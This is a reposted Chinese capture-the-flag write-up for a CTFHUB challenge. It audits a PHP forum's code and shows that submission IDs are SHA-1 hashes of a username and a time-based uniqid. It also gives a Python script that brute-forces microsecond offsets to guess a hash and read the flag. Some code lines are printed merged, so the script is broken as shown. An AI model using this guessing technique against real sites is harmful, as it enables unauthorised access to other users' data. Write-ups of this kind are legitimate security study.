复现平台CTFHUB
靶机为一个完整类论坛网页,题目给了服务端完整代码
代码审计
/src/submit.php Line56-63:
可以看到提交数据存入的时候将
$_SESSION["username"]."_"
作为前缀,生成了一个uniqid。uniqid的生成方式即
{sec:08x}{usec:05x}
/src/submission.php Line5-15:
在该查询界面中首选了
hash
参数作为查询方式,
意味着如果获得
存入数据库的时间
和
username
即可模拟出
hash
从而读取
flag
/src/submission.php Line16-44:
允许了通过
homeworkid
查询
入库时间
和
username
解题
在没有登录没有
session
访问challenge-xxxx.sandbox.ctfhub.com:10800/submission.php?homeworkid=1得到
提交时间
和
username
而入库时间和
uniqid
由于运行效率,会存在微秒时间差,因而需要爆破该时间差
exp
import requests
import hashlib
from datetime import datetime, timezone
username ="flagholder"
timestamp ='2022-12-26 20:59:48.231534'
dt = datetime.fromisoformat(timestamp)#.replace(tzinfo=timezone.utc)
sec =int(dt.timestamp())
usec = dt.microsecond
print(sec, usec)
url ='http://challenge-xxxx.sandbox.ctfhub.com:10800/submission.php?hash='defget_hash(sec, usec):
user_id =f"{username}_{sec:08x}{usec:05x}"return hashlib.sha1(user_id.encode()).hexdigest()for i inrange(0,1000):hash= get_hash(sec, usec - i)
r = requests.get(url +hash)print(i,hash)if r.text !="Submission not found.":print("Found hash:",hash)print(r.text)break
运行结果:
本文转载自: https://blog.csdn.net/qq_66748496/article/details/128454462
版权归原作者 randomErr 所有, 如有侵权,请联系我们删除。
版权归原作者 randomErr 所有, 如有侵权,请联系我们删除。